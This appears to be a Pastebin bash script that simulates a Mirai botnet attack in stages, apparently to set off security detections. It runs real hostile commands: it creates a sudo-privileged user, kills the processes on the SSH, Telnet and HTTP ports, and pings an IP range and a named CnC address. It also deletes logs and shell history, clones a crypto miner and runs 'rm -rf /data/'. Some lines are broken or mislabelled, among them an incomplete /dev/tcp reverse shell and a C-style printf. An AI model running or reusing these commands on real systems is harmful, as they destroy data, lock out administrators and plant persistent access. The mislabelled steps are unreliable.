Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Running from within the attacked device
- # Local host reconnaissance detected
- echo "###################################################################"
- echo " Conducting Reconnaissance "
- echo "###################################################################"
- echo "Conducting analysis of host data..."
- uname -a
- echo "Got host data"
- read -p "Press enter to continue attack"
- # Detected suspicious use of the useradd command
- echo "###################################################################"
- echo " Create User and Escalate Privilege "
- echo "###################################################################"
- USER="privilegeduser"${RANDOM}""
- echo "Adding user named ${USER} with privilege root to the system..."
- useradd $USER
- sudo usermod -aG sudo $USER
- echo "Successfully added user named /"${USER}/" with privilege root to the system"
- read -p "Press enter to continue attack"
- # Process running on multiple ports, Process killing other processes
- echo "###################################################################"
- echo " Kill SSH, Telnet and HTTP to hijack ports 23, 22, 80 "
- echo " Original logs from Mirai killer.c actor "
- echo "###################################################################"
- # port 23
- echo "[killer] Trying to kill port 23"
- echo "[killer] Finding and killing processes holding port 23"
- kill -9 $(lsof -i:23 -t) 2> /dev/null
- echo "[killer] Killed tcp/23 (telnet)"
- # insert connect to port
- echo "[killer] Bound to tcp/23 (Telnet)\n"
- # port 22
- echo "[killer] Trying to kill port 22"
- echo "[killer] Finding and killing processes holding port 22"
- kill -9 $(lsof -i:22 -t) 2> /dev/null
- echo "[killer] Killed tcp/22 (SSH)"
- # insert connect to port
- echo "[killer] Bound to tcp/22 (SSH)\n"
- # port 80
- echo "[killer] Trying to kill port 80"
- echo "[killer] Finding and killing processes holding port 80"
- kill -9 $(lsof -i:80 -t) 2> /dev/null
- echo "[killer] Killed tcp/80 (http)"
- # insert connect to port
- echo "[killer] Bound to tcp/80 (http)\n"
- read -p "Press enter to continue attack"
- echo "###################################################################"
- echo " Find and Kill Competing Malware "
- echo "###################################################################"
- echo "Looking for competing malware..."
- kill -9 $(pgrep anime) 2> /dev/null
- echo "Killing .anime malware process..."
- echo "[killer] Finished"
- read -p "Press enter to continue attack"
- echo "###################################################################"
- echo " Scan The Network for More Volunrable Devices "
- echo " Original logs from Mirai scanner.c actor "
- echo "###################################################################"
- printf("[scanner] Scanner process initialized. Scanning started..."
- IPCIDR=13.92.249.
- for ((i=0; i<20; i++))
- do
- IP=$IPCIDR${i}
- echo "pinging ${IP}"
- ping -c3 $IP
- done
- read -p "Press enter to continue attack"
- # Reverse shells, Suspicious IP address communication, Possible backdoor detected
- echo "###################################################################"
- echo " Communicating with CnC for getting attack commands "
- echo "###################################################################"
- echo "Setting up a backdoor..."
- touch d-bus notifier
- echo "Backdoor set up"
- echo "Opening reverse shell..."
- bash /dev/tcp/
- echo "Reverse shell established"
- echo "Communicating with CnC server..."
- ping -c3 110.249.212.46 > pingtoCnC.txt
- echo "Listening to CnC for future attack commands..."
- read -p "Press enter to continue attack"
- # Removal of system logs files detected, Potential overriding of common files,
- echo "###################################################################"
- echo " Covering Tracks - Deleting Logs and Executables"
- echo "###################################################################"
- echo "Removing system logs..."
- rm /var/log/lastlog
- echo "Removed system logs"
- echo "Overriding linux system files..."
- cp /bin/netstat a
- echo "Overrode linux system files"
- echo "Deleting history files..."
- history -c
- echo "Deleted history files"
- read -p "Press enter to continue attack"
- echo "*******************************************************************"
- echo "*******************************************************************"
- echo " Mirai Botnet Expansion Scenarios "
- echo "*******************************************************************"
- echo "*******************************************************************"
- read -p "Press enter to continue attack"
- # Crypto Coin Miner
- echo "###################################################################"
- echo " Mirai Variant - Mining Crypto Currency Using the Botnet "
- echo "###################################################################"
- echo "Setting up crypto miner..."
- git clone https://github.com/cpuminer
- echo "Mining crypto with device resources"
- read -p "Press enter to continue attack"
- # Possible loss of data detected
- echo "###################################################################"
- echo " Fish Tank Scenario - Egress Data Through IoT Device "
- echo "###################################################################"
- echo "Sending data collected through the device..."
- rm -rf /data/
- echo "Sent data"
- read -p "Press enter to continue attack"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement